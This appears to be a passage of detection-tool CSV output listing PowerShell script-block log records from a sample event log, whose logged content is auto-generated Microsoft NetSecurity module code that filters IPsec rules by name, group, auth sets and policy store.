[Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } 
if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and 
(@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 
'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Servers')) { [object]$__cmdletization_value = ${Servers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Domains')) { [object]$__cmdletization_value = ${Domains} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AddressType')) { [object]$__cmdletization_value = ${AddressType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if 
($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 